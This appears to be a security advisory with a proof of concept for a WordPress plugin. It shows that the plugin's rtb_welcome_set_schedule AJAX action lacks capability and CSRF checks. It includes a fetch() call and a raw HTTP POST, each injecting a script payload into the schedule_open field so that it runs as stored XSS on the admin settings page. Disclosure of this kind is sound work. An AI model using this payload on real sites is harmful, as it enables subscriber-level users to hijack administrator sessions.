The plugin does not have capability and CSRF checks in the rtb_welcome_set_schedule AJAX action, allowing any authenticated users to call it. Due to the lack of sanitisation and escaping, users with a role as low as subscriber could perform Cross-Site Scripting attacks against logged in admins
As a subscriber:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"rtb_welcome_set_schedule", "schedule_open": '{"\\"><script>if (!window.alreadyExploited) alert(1); window.alreadyExploited = 1;</script>": {"weekdays":{"wednesday":"1"},"time":{"start":"1:45 AM","end":""}}}'}),
"method": "POST",
"credentials": "include"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: [any authenticated user]
action=rtb_welcome_set_schedule&schedule_open=%7B%22%5C%22%3E%3Cscript%3Eif+%28%21window.alreadyExploited%29+alert%28%2FXSS%2F%29%3B+window.alreadyExploited+%3D+1%3B%3C%2Fscript%3E%22%3A+%7B%22weekdays%22%3A%7B%22wednesday%22%3A%221%22%7D%2C%22time%22%3A%7B%22start%22%3A%221%3A45+AM%22%2C%22end%22%3A%22%22%7D%7D%7D
Then the XSS will be triggered in the plugin's settings: https://example.com/wp-admin/admin.php?page=rtb-settings